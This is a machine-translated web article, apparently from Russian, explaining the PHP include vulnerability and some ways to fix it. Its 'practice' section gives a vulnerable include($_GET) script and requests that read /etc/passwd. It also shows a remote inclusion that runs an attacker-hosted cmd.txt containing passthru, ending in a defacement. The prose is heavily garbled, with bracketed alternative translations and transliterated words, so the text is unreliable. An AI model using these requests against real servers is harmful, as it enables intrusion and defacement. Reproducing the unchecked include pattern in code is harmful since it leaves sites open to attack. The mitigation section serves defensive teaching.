Home Links
Home Page
Registration of domain names by the hands. The corporate domain in a zone
PROMOTION of the SITE - some advice in the help to the web designer!
Reserve copying of bases MySQL
Upload File (Loading of a file on the server means Perl)
MySQL against PostgreSQL
Easy navigation
Email without the SPAM
Research of search engines
PHP include vulnerability: from the theory to practice
Dynamic change of elements in list SELECT
Tabulared imposition.
Promotion of a site in search engines
The SEO-expert shares the secrets
PHP and XML
Language XML
New format SVG will create competition Flash?
What is necessary a site? (Continuation)
Advice{Councils} of the layman or how to make a high-grade corporate site.
The designer and the customer. What is necessary a site?
topic

PHP include vulnerability: from the theory to practice

In this clause{article} I shall tell to you about one of the most widespread ujazvimostej, meeting in php-scripts - include "bug". You learn{find out} both a principle of action, and some ways of elimination of the given vulnerability.


Attention!!! The information submitted in the given clause{article} serves cleanly in the fact-finding purposes! The author does not bear{carry} any responsibility for its{her} ill-intentioned application!


The theory


Vulnerability php - include one of the most known, but meanwhile and most widespread "holes" meeting today in php scripts. She arises, when by a carelessness, ignorance, or on any to another conducted only to him to one to reason, the programmer allows to use the data transferred{handed} to the script as parameters, without additional check (such data still name "mechenymi") as parameter function include. That it is better to understand basically actions of the given vulnerability, it is necessary to have some performance about the above-named function.


php function include, and also include_once


The given function is used for connection to started php to the script of additional program modules. And, as against similar on properties require, function include executes these modules directly in the process. And consequently, modules attached thus will be executed not as separate scripts, and as parts connected them to themselves of the script. More precisely, include will execute only that part of a file which is made between spec. Tags:


" <? php " or " <? "

"?> "


The everything else php simply gives out as the text. I.e. if to connect a text file (for example:/etc/passwd:)) not containing the specified tags, all contents of this file will be given by the interpreter.


Example of a call:


include ($file);


As you probably have noticed, function include has only 1 parameter ($file) which specifies a way and a name of a file of the connected module. It is necessary to note also, that in juniksopodobnykh systems (depending on adjustments php) as parameter it is possible to pass not only a way and a name of a file, but also url (the Internet the address) a file (!!!).


Practice


Let's assume, on some WEB - SERVER it is established following php the script (it  url http: // www.superpupersite.com/index.php):



<? php

include ($http_get_vars ["file"]);

?>


And also set of various connected scripts - modules for him :


home.php

feedback.php

...


The author of this script assumed, that all visitors of a site will peacefully pass from one page to another pressing buttons, references and other objects of management. And the script, depending on the transferred{handed} parameter file, will attach one or other module, thus generating various html pages (more often include use thus).


Examples of searches:


http: // www.superpupersite.com/index.php? file=home.php

http: // www.superpupersite.com/index.php? file=feedback.php


He even could not imagine, that once (in ice cold winter poru) on a site a certain inquisitive Vasja Pupkin will come. Which, proceeding from the inquisitiveness considering{examining} these links, would assume (while he yet does not know, as well as that there actually), that the parameter file is not than other as a name and a way to a file and that the script uses function include (not surprisingly since for today include it is used almost in everyone 3 script). Vasja has there and then decided to check up the assumption as follows:


Has queried a kind: http: // www.superpupersite.com/index.php? file =/etc/passwd

On an output{exit} has received contents of a file passwd the server

P.S: If on the server in options php the mode of debugging is switched on, to reveal similar vulnerability does not make special work under characteristic messages on mistakes (Like: " failed opening 'filename' for inclusion... "! But in this case the mode of debugging has been switched - off (every dog has his day).


" It is healthy! Quite probably that my assumption concerning include is correct! " Think Vasja. And also Vasja has noticed, that the server works under management junikspodobnoj operational system (there there is a file/etc/passwd). From this all he has drawn a conclusion, that probably it will be possible to introduce the php the module that last was carried out on the party  of the server. Now, for realization of the ominous plans, V.Pupkinu is necessary allowing to add and edit access files on any WEB - SERVER. Fortunately, for today to receive a slow, free-of-charge hosting does not make special problems and at our hero has already been laid up on such unexpected:) cases of a life the site http://pupkin.halava123.ru. Where he has providently begun to rock the script of the following maintenance{contents}:



<? passthru (" ls-al ");?>


Simple, it is necessary to say, a script deducing{removing} in a window of a browser the list of files and catalogues in the current directory (but for stock-taking vulnerability of it  will suffice:)). The script has been placed to the address:


http://pupkin.halava123.ru/cmd.txt


Vasja has executed the following search:


http://www.superpupersite.com/index.php?file=http://pupkin.halava123.ru/cmd.txt


And at him  it has turned out! As well as reflected, in a window of a browser he has seen the list of files and catalogues. Further on increasing, "hole" has been found out, and to a course there were not less interesting scripts which detailed description would borrow{occupy} a lot of place and on these reasons is not published here:) in general, whether for a long time, whether shortly, but all has ended defejsom (defejs - substitution of a home page on the). Such sad history!


Struggle against the wrecker


Having read all above described, many of you asked a question: whether " there are methods of struggle against this uzhastnoj vulnerability? ". "Yes" - I am proud otvechau:). The some people (at all all) from them:


The most simple way, from the point of view of programming, it to transform a variable $module in a numerical format (settype ($module, "integer")), but thus it is necessary to number modules, and also to collect them in one catalogue ("module1.php", "module2.php" … “ module <n> .php “).


More complex  from the point of view of realization a method of pest control:) is a creation of the separate file - list of modules which are possible for starting. And in dependence, whether there is this or that module in the list, to carry out or give out a corresponding mistake (or to start the module by default or if you, want to frighten "experimenter" to give out the message that his  address it is fixed and that he dried crackers...).

Example:



switch ($case) // $case - a name of a variable transmitted to parameter to a script

{

case news:

include ("news.php");

break;


case articles:

include ("guestbook.php");

break;


... //, etc.

default:

include ("index.php"); // if in a variable $case value which is taken into account{discounted} above the main page opens will not be transferred{handed}

break;

}


The third method is intermediate something average between 1-st and 2-nd. You should replace all service symbols ("..", "/", " ") for example, on crossed out sections. To tell the truth, modules (only carried out modules and anything except for them there should settle down!!!) in this case should settle down in one catalogue, but their names can be normal words (for example "news", "guestbook", etc.).

The conclusion


In general and everything, that I wanted to tell to you this time. The conclusion from this all can be such: before use the data received from the user in yours web scripts think, instead of whether it is necessary to check up preliminary them and properly to process. It concerns not only fields of the data of the form transmitted by a browser (methods get and post), but also cookie (the malefactor can reach and them).